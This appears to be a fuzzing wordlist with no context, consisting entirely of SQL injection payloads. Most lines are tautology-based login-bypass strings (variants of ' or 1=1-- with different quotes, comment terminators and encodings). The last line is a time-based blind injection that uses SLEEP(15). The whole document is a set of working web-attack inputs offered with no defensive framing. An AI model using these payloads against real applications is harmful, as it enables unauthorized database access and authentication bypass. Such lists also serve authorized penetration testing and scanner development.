'or 1=1 or ''='
" or "1"="1
" or "1"="1"--
" or "1"="1"#
" or "1"="1"/*
"or 1=1 or ""="
" or 1=1
" or 1=1#
" or 1=1/*
') or ('x'='x
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"#
") or ("1"="1"/*
") or "1"="1
") or "1"="1"--
") or "1"="1"#
") or "1"="1"/*
' or         1=1 #
' or 1=1 #
" or 1=1 --
" or 1=1 #
" or 1=1 -
%' or '1'='1
 or 1=1-
' or '1'='1
' or '1'='1'/*
' or '1'='1'#
' or '1′='1
' or 1=1 -
' or 1=1;#
' or 1=1/*
' or 1=1#
' or 1=1-
') or '1'='1
') or '1'='1--
') or '1'='1'--
') or '1'='1'/*
') or '1'='1'#
') or ('1'='1
') or ('1'='1--
') or ('1'='1'--
') or ('1'='1'/*
') or ('1'='1'#
) or ('x'='x
' OR NOT 2470=2470-- Ontu
' or 1=1 --"
' or 'a'='a
' or 2 > 1
 or '7659'='7659
 or 'text' = n'text'
' or 'x'='x';
) or (a=a
' OR 'x'='x
 OR 1=1
 or 1=1
; or '1'='1'
 or 1=1 /*
' or 1=1 or 'x'='y
 or '1'='1'--
"a"" or 1=1--"
//*
 or 1=1 --
' OR full_name LIKE '%Bob%
' or 'x'='x
') or ('x'='x
' or 0=0 --
' or 0=0 #
 or 0=0 #"
' or 0=0 #"
' or '1'='1'--
' or 1 --'
 or 1=1--
' or 1=1 or ''='
 or 1=1 or ""=
' or a=a--
 or a=a
'hi' or 'x'='x';
' or ''='
' or 3=3
 or 3=3 --
' or 1=1
" or 0=0 --
"hi"") or (""a""=""a"
) or ('a'='a
') or ('a'='a
"a"" or 3=3--"
" or "a"="a
or 1=1 or ''='
or 1=1 --
/**/or/**/1/**/=/**/1
'/**/or/**/1/**/=/**/1
' or 1=1--
' or 'a' = 'a
 or a=a--
 or '1'='1
 or 1 --'
" or 1=1--
' or 3=3--
 or 'text' > 't'
 or x=x
' or 1=1 --
 or 'x'='x
 or 'something' = 'some'+'thing'
½ or 1=1 --
%27 or 1=1
 or 0=0 --
 or 0=0 #
 or 1/*
 or a = a
 or ''='
' AND (SELECT * FROM (SELECT(SLEEP(15)))bAKL) AND 'vRxe'='vRxe
